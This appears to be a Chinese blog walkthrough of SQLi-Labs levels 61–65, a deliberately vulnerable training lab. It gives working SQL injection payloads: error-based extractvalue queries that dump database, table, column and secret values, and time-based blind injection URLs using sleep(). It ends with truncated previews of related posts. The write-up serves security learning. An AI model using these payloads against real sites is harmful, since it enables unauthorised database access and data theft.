最後五關!
第六十一關
和六十關基本一樣,就是變成了單括號和雙括號,這好像是第一次遇見雙括號
爆資料庫名 ?id=1'))and extractvalue(1, concat(0x5c, (select database())))%23
爆表名 ?id=0『)) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))%23
爆列名 ?id=-1')) union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='73eg2fztqt'),0x7e))--+
爆資料 ?id=-1')) union select extractvalue(1,concat(0x7e,(select group_concat(secret_bpyl) from 73eg2fztqt),0x7e))--+
輸入(j6ovsqh7quraqt1ywsf06spm)進去後
bug off you silly dumb hacker(滾開你這個愚蠢的黑客)
第六十二關
這關這次聯合注入和報錯注入都不可以了 ,那我們呢用盲注
第六十三關
和六十二關基本一樣,唯一區別在於需要使用單引號閉合
?id=0%27and%20if(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正確時間短,錯誤時間長
第六十四關
和六十二關基本一樣,唯一區別在於需要使用括號閉合
?id=0))and%20if(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正確時間短,錯誤時間長
第六十五關
和六十二關基本一樣,同上,只不過?id=1」) 正確延時
結束!
Sqli Labs闖關 更新中
正常訪問 一 判斷 1 and1 2 訪問正常,不是數值查詢 1 報錯,可能為sql字元注入1 返回正常,所以為單引號字元注入 注 1 我使用的是 來注釋sql後面的語句,的作用是,它在解析的時候會被解析為空格,用來隔開 與後面語句。2 注釋也是可行的,但在瀏覽器的url中,他是被用來指導瀏覽器動作...
sqli labs闖關筆記 less8 10 盲注
一 布林型盲注,布林盲注與less6思路一致。1 查詢注入點 輸入單引號,you are in消失,證明存在注入點。找到閉合引數的方法,單引號後面直接加注釋,you are in出現,證明閉合方式正確。2 猜資料庫名 and left select database 1 s 3 猜表名 and as...
CPSE考試之驚險闖關
這兩周忙著準備 cpse 考試,經過星期四的失敗後,星期五總算是驚險闖關成功,在這裡簡單介紹一下這個考試好了.cpse 全名為 cisco product solution essential,是屬於 cisco sales 的認證,一般說來,想要賣 cisco 產品的話,除了要有通過認證的工程師外...